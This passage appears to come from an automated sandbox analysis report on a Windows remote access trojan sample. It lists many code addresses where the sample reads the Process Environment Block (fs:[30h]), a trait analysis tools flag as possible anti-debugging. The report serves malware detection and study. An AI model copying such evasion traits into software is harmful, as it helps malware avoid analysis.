                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF4FD mov eax, dword ptr fs:[00000030h]0_2_022BF4FD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022864CE mov eax, dword ptr fs:[00000030h]0_2_022864CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B14DE mov eax, dword ptr fs:[00000030h]0_2_022B14DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E04DB mov eax, dword ptr fs:[00000030h]0_2_022E04DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E04DB mov eax, dword ptr fs:[00000030h]0_2_022E04DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E04DB mov eax, dword ptr fs:[00000030h]0_2_022E04DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E04DB mov eax, dword ptr fs:[00000030h]0_2_022E04DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6538 mov eax, dword ptr fs:[00000030h]0_2_022D6538
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BE57B mov eax, dword ptr fs:[00000030h]0_2_022BE57B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BE57B mov eax, dword ptr fs:[00000030h]0_2_022BE57B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229E54E mov eax, dword ptr fs:[00000030h]0_2_0229E54E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229E54E mov ecx, dword ptr fs:[00000030h]0_2_0229E54E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229E54E mov eax, dword ptr fs:[00000030h]0_2_0229E54E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD5A4 mov eax, dword ptr fs:[00000030h]0_2_022BD5A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF582 mov eax, dword ptr fs:[00000030h]0_2_022BF582
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022845EE mov eax, dword ptr fs:[00000030h]0_2_022845EE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022845EE mov ecx, dword ptr fs:[00000030h]0_2_022845EE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DF5DD mov eax, dword ptr fs:[00000030h]0_2_022DF5DD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DF5DD mov eax, dword ptr fs:[00000030h]0_2_022DF5DD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DFA18 mov eax, dword ptr fs:[00000030h]0_2_022DFA18
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AEA6E mov eax, dword ptr fs:[00000030h]0_2_022AEA6E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AEA6E mov ecx, dword ptr fs:[00000030h]0_2_022AEA6E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D7A62 mov eax, dword ptr fs:[00000030h]0_2_022D7A62
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ADA7E mov eax, dword ptr fs:[00000030h]0_2_022ADA7E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ADA7E mov eax, dword ptr fs:[00000030h]0_2_022ADA7E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ADA7E mov eax, dword ptr fs:[00000030h]0_2_022ADA7E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C7A4E mov eax, dword ptr fs:[00000030h]0_2_022C7A4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C7A4E mov eax, dword ptr fs:[00000030h]0_2_022C7A4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D2A45 mov eax, dword ptr fs:[00000030h]0_2_022D2A45
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D2A45 mov ecx, dword ptr fs:[00000030h]0_2_022D2A45
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DAA5C mov eax, dword ptr fs:[00000030h]0_2_022DAA5C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DCA55 mov eax, dword ptr fs:[00000030h]0_2_022DCA55
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFAEE mov eax, dword ptr fs:[00000030h]0_2_022BFAEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFAEE mov eax, dword ptr fs:[00000030h]0_2_022BFAEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229DAFE mov eax, dword ptr fs:[00000030h]0_2_0229DAFE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229DAFE mov ecx, dword ptr fs:[00000030h]0_2_0229DAFE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B1ADE mov eax, dword ptr fs:[00000030h]0_2_022B1ADE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C8B2F mov eax, dword ptr fs:[00000030h]0_2_022C8B2F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C8B2F mov ecx, dword ptr fs:[00000030h]0_2_022C8B2F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A2B2E mov eax, dword ptr fs:[00000030h]0_2_022A2B2E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228CB25 mov eax, dword ptr fs:[00000030h]0_2_0228CB25
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228CB25 mov eax, dword ptr fs:[00000030h]0_2_0228CB25
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DCB37 mov eax, dword ptr fs:[00000030h]0_2_022DCB37
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CBB37 mov eax, dword ptr fs:[00000030h]0_2_022CBB37
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CBB37 mov eax, dword ptr fs:[00000030h]0_2_022CBB37
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CBB37 mov eax, dword ptr fs:[00000030h]0_2_022CBB37
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CBB37 mov eax, dword ptr fs:[00000030h]0_2_022CBB37
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CBB37 mov ecx, dword ptr fs:[00000030h]0_2_022CBB37
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CDB0A mov eax, dword ptr fs:[00000030h]0_2_022CDB0A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DFB46 mov eax, dword ptr fs:[00000030h]0_2_022DFB46
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DFB46 mov eax, dword ptr fs:[00000030h]0_2_022DFB46
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A4BAD mov ecx, dword ptr fs:[00000030h]0_2_022A4BAD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A4BAD mov eax, dword ptr fs:[00000030h]0_2_022A4BAD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6BB1 mov eax, dword ptr fs:[00000030h]0_2_022D6BB1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6BB1 mov eax, dword ptr fs:[00000030h]0_2_022D6BB1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3B80 mov eax, dword ptr fs:[00000030h]0_2_022C3B80
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3B80 mov eax, dword ptr fs:[00000030h]0_2_022C3B80
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3B80 mov eax, dword ptr fs:[00000030h]0_2_022C3B80
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABB86 mov eax, dword ptr fs:[00000030h]0_2_022ABB86
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABB86 mov eax, dword ptr fs:[00000030h]0_2_022ABB86
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABB86 mov eax, dword ptr fs:[00000030h]0_2_022ABB86
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABB86 mov eax, dword ptr fs:[00000030h]0_2_022ABB86
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFB9E mov eax, dword ptr fs:[00000030h]0_2_022BFB9E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFB9E mov eax, dword ptr fs:[00000030h]0_2_022BFB9E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B1BE5 mov eax, dword ptr fs:[00000030h]0_2_022B1BE5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC83B mov eax, dword ptr fs:[00000030h]0_2_022AC83B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC83B mov eax, dword ptr fs:[00000030h]0_2_022AC83B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC83B mov ecx, dword ptr fs:[00000030h]0_2_022AC83B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C980E mov eax, dword ptr fs:[00000030h]0_2_022C980E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AD84E mov eax, dword ptr fs:[00000030h]0_2_022AD84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AD84E mov eax, dword ptr fs:[00000030h]0_2_022AD84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AD84E mov eax, dword ptr fs:[00000030h]0_2_022AD84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AD84E mov eax, dword ptr fs:[00000030h]0_2_022AD84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227D84E mov eax, dword ptr fs:[00000030h]0_2_0227D84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227D84E mov eax, dword ptr fs:[00000030h]0_2_0227D84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227D84E mov eax, dword ptr fs:[00000030h]0_2_0227D84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227D84E mov eax, dword ptr fs:[00000030h]0_2_0227D84E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DC8A4 mov eax, dword ptr fs:[00000030h]0_2_022DC8A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DC8A4 mov eax, dword ptr fs:[00000030h]0_2_022DC8A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D38B3 mov eax, dword ptr fs:[00000030h]0_2_022D38B3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D38B3 mov eax, dword ptr fs:[00000030h]0_2_022D38B3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C989E mov ecx, dword ptr fs:[00000030h]0_2_022C989E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BE8FE mov eax, dword ptr fs:[00000030h]0_2_022BE8FE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F6 mov eax, dword ptr fs:[00000030h]0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov ecx, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B08DE mov eax, dword ptr fs:[00000030h]0_2_022B08DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BE93E mov eax, dword ptr fs:[00000030h]0_2_022BE93E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DD980 mov eax, dword ptr fs:[00000030h]0_2_022DD980
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E09C4 mov eax, dword ptr fs:[00000030h]0_2_022E09C4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E09C4 mov eax, dword ptr fs:[00000030h]0_2_022E09C4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E09C4 mov eax, dword ptr fs:[00000030h]0_2_022E09C4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E09C4 mov eax, dword ptr fs:[00000030h]0_2_022E09C4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC9C5 mov eax, dword ptr fs:[00000030h]0_2_022AC9C5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC9C5 mov eax, dword ptr fs:[00000030h]0_2_022AC9C5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC9C5 mov eax, dword ptr fs:[00000030h]0_2_022AC9C5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BEE2E mov eax, dword ptr fs:[00000030h]0_2_022BEE2E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BEE2E mov eax, dword ptr fs:[00000030h]0_2_022BEE2E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov eax, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov eax, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov ecx, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov eax, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov eax, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov eax, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0E4E mov eax, dword ptr fs:[00000030h]0_2_022B0E4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFE8E mov eax, dword ptr fs:[00000030h]0_2_022BFE8E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227CE95 mov eax, dword ptr fs:[00000030h]0_2_0227CE95
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0227CE95 mov ecx, dword ptr fs:[00000030h]0_2_0227CE95
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFEEE mov eax, dword ptr fs:[00000030h]0_2_022BFEEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFEEE mov eax, dword ptr fs:[00000030h]0_2_022BFEEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABEDE mov eax, dword ptr fs:[00000030h]0_2_022ABEDE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABEDE mov eax, dword ptr fs:[00000030h]0_2_022ABEDE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABEDE mov eax, dword ptr fs:[00000030h]0_2_022ABEDE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABEDE mov eax, dword ptr fs:[00000030h]0_2_022ABEDE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DCF20 mov eax, dword ptr fs:[00000030h]0_2_022DCF20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DCF20 mov eax, dword ptr fs:[00000030h]0_2_022DCF20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AAF31 mov ecx, dword ptr fs:[00000030h]0_2_022AAF31
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AAF31 mov eax, dword ptr fs:[00000030h]0_2_022AAF31
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C4F0E mov eax, dword ptr fs:[00000030h]0_2_022C4F0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C4F0E mov eax, dword ptr fs:[00000030h]0_2_022C4F0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BEF1C mov eax, dword ptr fs:[00000030h]0_2_022BEF1C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BEF1C mov eax, dword ptr fs:[00000030h]0_2_022BEF1C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CAF4E mov eax, dword ptr fs:[00000030h]0_2_022CAF4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CAF4E mov ecx, dword ptr fs:[00000030h]0_2_022CAF4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DEF5D mov eax, dword ptr fs:[00000030h]0_2_022DEF5D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DEF5D mov ecx, dword ptr fs:[00000030h]0_2_022DEF5D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3FAA mov eax, dword ptr fs:[00000030h]0_2_022C3FAA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C3FAA mov eax, dword ptr fs:[00000030h]0_2_022C3FAA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6FBE mov eax, dword ptr fs:[00000030h]0_2_022D6FBE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BFFEE mov eax, dword ptr fs:[00000030h]0_2_022BFFEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0C32 mov eax, dword ptr fs:[00000030h]0_2_022E0C32
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0C0E mov eax, dword ptr fs:[00000030h]0_2_022B0C0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0C0E mov eax, dword ptr fs:[00000030h]0_2_022B0C0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0C0E mov eax, dword ptr fs:[00000030h]0_2_022B0C0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B0C0E mov eax, dword ptr fs:[00000030h]0_2_022B0C0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C2C6A mov ecx, dword ptr fs:[00000030h]0_2_022C2C6A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D7C54 mov eax, dword ptr fs:[00000030h]0_2_022D7C54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D7C54 mov eax, dword ptr fs:[00000030h]0_2_022D7C54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D7C54 mov eax, dword ptr fs:[00000030h]0_2_022D7C54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02281C8D mov eax, dword ptr fs:[00000030h]0_2_02281C8D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C4C82 mov eax, dword ptr fs:[00000030h]0_2_022C4C82
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D3C9C mov eax, dword ptr fs:[00000030h]0_2_022D3C9C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D3C9C mov eax, dword ptr fs:[00000030h]0_2_022D3C9C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D3C9C mov eax, dword ptr fs:[00000030h]0_2_022D3C9C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D3C9C mov ecx, dword ptr fs:[00000030h]0_2_022D3C9C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D3C9C mov eax, dword ptr fs:[00000030h]0_2_022D3C9C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D3C9C mov ecx, dword ptr fs:[00000030h]0_2_022D3C9C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6C90 mov eax, dword ptr fs:[00000030h]0_2_022D6C90
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D6C90 mov eax, dword ptr fs:[00000030h]0_2_022D6C90
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AECEE mov eax, dword ptr fs:[00000030h]0_2_022AECEE
